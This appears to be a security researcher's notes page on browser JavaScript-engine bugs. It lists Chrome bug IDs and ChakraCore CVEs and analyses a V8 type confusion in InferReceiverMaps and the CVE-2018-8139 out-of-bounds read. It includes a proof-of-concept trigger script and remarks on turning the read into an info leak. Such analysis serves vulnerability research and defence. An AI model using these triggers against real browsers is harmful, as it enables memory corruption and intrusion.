Vulnerabilities from Chrome

Chrome

Bugs:715582

Bugs:732169

CVE-2017-5115/Bugs:744584

Bugs:746946

Bugs:752149

Bugs:757199

Bugs:765433

Bugs:762874

Bugs:772420

Bugs:776677

Bugs:784533

Bugs:788539

Bugs:787910

Bugs:791245

Bugs:791953

Bugs:794394

Bugs:794822

Bugs:797596

Bugs:794405/794359

Bugs:799263

Bugs:797130

Bugs:801627

Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
  if (IsSame(receiver, effect)) {
    HeapObjectMatcher mtarget(GetValueInput(effect, 0));
    HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
    if (mtarget.HasValue() && mnewtarget.HasValue()) {
      // new.target is cast to JSFunction with no type check; a
      // JSBoundFunction constant lands here too.
      Handle<JSFunction> original_constructor =
          Handle<JSFunction>::cast(mnewtarget.Value());

      // These field reads assume a JSFunction layout.
      if (original_constructor->has_initial_map()) {
        Handle<Map> initial_map(original_constructor->initial_map());
        if (initial_map->constructor_or_backpointer() ==
            *mtarget.Value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map);
          return result;
        }
      }
    }
    // We reached the allocation of the {receiver}.
    return kNoReceiverMaps;
  }
  break;
}

“mnewtarget” is the new.target value of the JSCreate node. It is expected to be a constructor, and a constructor can also be a JSBoundFunction. The code casts it to JSFunction unconditionally and then reads has_initial_map()/initial_map() through that handle, so a bound function supplied as new.target is interpreted with a JSFunction layout: a type confusion in the optimizing compiler.

PoC:
// Flags: --allow-natives-syntax --enable_slow_asserts

class Base {
constructor() {
this.x = 1;
}
}

class Derived extends Base {
constructor() {
// super() in a derived constructor is where the JSCreate node should be emitted (author's guess).
super();
}
}

let bound = Object.bind();
// Feed a bound function as new.target to the type profiler, so that
// HeapObjectMatcher later finds it as a constant.
Reflect.construct(Derived, [], bound);

%OptimizeFunctionOnNextCall(Derived);

new Derived();
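The PoC works because of a language-level fact the compiler code above ignores: inside a constructor, new.target is whatever constructor was handed to Reflect.construct, and that may be a bound function (V8's JSBoundFunction), which has no own "prototype" property. The following is an added example, not code from the original page or from V8, that records new.target and the resulting object's prototype for both the normal and the bound-function case; the names recordNewTarget, Base and Derived are this example's own.

```javascript
// Added example (not from the original page or from V8): observe new.target
// inside a constructor when Reflect.construct is given a bound function as
// its newTarget, the situation InferReceiverMaps did not account for.
function recordNewTarget(useBoundNewTarget) {
  let seen;                        // the new.target observed inside Base
  class Base {
    constructor() {
      seen = new.target;
      this.x = 1;
    }
  }
  class Derived extends Base {
    constructor() {
      super();                     // super() forwards new.target unchanged
    }
  }
  const bound = Object.bind();     // a bound function, as in the PoC above
  const newTarget = useBoundNewTarget ? bound : Derived;
  const obj = Reflect.construct(Derived, [], newTarget);
  return {
    newTargetWasBound: seen === bound,
    newTargetWasDerived: seen === Derived,
    // A bound function has no "prototype" property, so the spec falls back to
    // %Object.prototype% for the new object instead of Derived.prototype.
    proto: Object.getPrototypeOf(obj),
    boundHasPrototype: Object.prototype.hasOwnProperty.call(bound, 'prototype'),
    x: obj.x,
    Derived,
  };
}
```

With a bound new.target the object is still initialized by Base (x === 1) but its prototype is Object.prototype, not Derived.prototype. That mismatch is exactly why the compiler must not assume new.target is a plain JSFunction whose initial map describes the receiver.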

Bugs:802060

Bugs:802333

Bugs:803022

Bugs:804801

Bugs:804837

Bugs:818144

https://bugs.chromium.org/p/chromium/issues/detail?id=818144
Patch not found.

Bugs:818811

https://bugs.chromium.org/p/chromium/issues/detail?id=818811
Patch not found.

Bugs:819311

Bugs:820984

Bugs:822284

Bugs:829679

Edge

Watch for updates:

https://github.com/Microsoft/ChakraCore/wiki/Roadmap

v1.8.3

CVE-2018-8139

Without the optional newTarget argument, Reflect.construct(target, args) behaves exactly like new target(...args).
The argument exists for a rare need in some frameworks: the instance is initialized by target, but the result must look like an instance of newTarget (its prototype comes from newTarget.prototype).

  • root cause
    BoundFunction::NewInstance did not take the CallFlags_ExtraArg flag into account when it invoked the target function, so the extra argument (here, newTarget) was not copied into the forwarded argument list.
    The patch adds handling for that flag:
    +           if (args.HasExtraArg())
    + {
    + newValues[index++] = args.Values[argCount];
    + }
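Review bot: The copy `newValues[index++] = args.Values[argCount];` is correctly guarded by `args.HasExtraArg()`, but nothing in this hunk shows newValues being allocated with room for that extra slot, nor the CallFlags_ExtraArg flag being carried on the call info used for the forwarded call; both need to hold, since the target's OP_LdNewTarget locates new.target by the flag rather than by how many values were copied. A one-line comment on why index argCount is the extra argument (it sits immediately after the argCount declared arguments) would also help the next reader.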


Without that copy, the forwarded call still carried the CallFlags_NewTarget flag,
so when the target function was actually invoked, InterpreterStackFrame::OP_LdNewTarget read new.target from the slot past the end of the Args array on the stack: an 8-byte out-of-bounds read.


  • info leak
    Can the stack contents be arranged so that the out-of-bounds read returns something useful?
  • how to find?
    Flag handling, a logic bug; found by auditing?
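The three call shapes discussed above (plain construct, construct with an explicit newTarget, and the CVE-2018-8139 trigger shape of a bound function as target plus an explicit newTarget) can be checked on a spec-conforming engine. The block below is an added example, not code from the original page or from ChakraCore; the names Target, NewTarget and the four helper functions are this example's own, and it only shows the correct (post-fix) semantics, not the out-of-bounds read.

```javascript
// Added example (not from the original page or from ChakraCore): the
// Reflect.construct(target, args, newTarget) semantics that the root-cause
// note for CVE-2018-8139 relies on, exercised on a spec-conforming engine.
function Target(a) {
  this.a = a;
  this.seenNewTarget = new.target;   // what the callee observes as new.target
}
function NewTarget() {}
NewTarget.prototype.kind = 'newTarget';

// No newTarget: identical to new Target(5).
function plainConstruct() {
  return Reflect.construct(Target, [5]);
}

// Explicit newTarget: initialized by Target, prototype taken from NewTarget.
function constructWithNewTarget() {
  return Reflect.construct(Target, [5], NewTarget);
}

// Bound target, no newTarget: the spec substitutes the bound target (Target)
// for new.target, so this is the "no extra arg" path.
function constructBoundPlain() {
  const bound = Target.bind(null, 9);   // pre-binds a = 9
  return Reflect.construct(bound, []);
}

// The CVE-2018-8139 shape: bound target plus an explicit newTarget. The bound
// function's [[Construct]] must forward newTarget (ChakraCore's "extra arg")
// to Target along with the bound arguments.
function constructBoundWithNewTarget() {
  const bound = Target.bind(null, 9);
  return Reflect.construct(bound, [], NewTarget);
}
```

In the last case the instance gets a === 9 from the bound argument, sees NewTarget as new.target, and is an instance of NewTarget but not of Target. A correct bound-function construct path has to carry that extra value through; the bug was that the value was dropped while the flag announcing it was kept.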

v1.8.4

CVE-2018-8229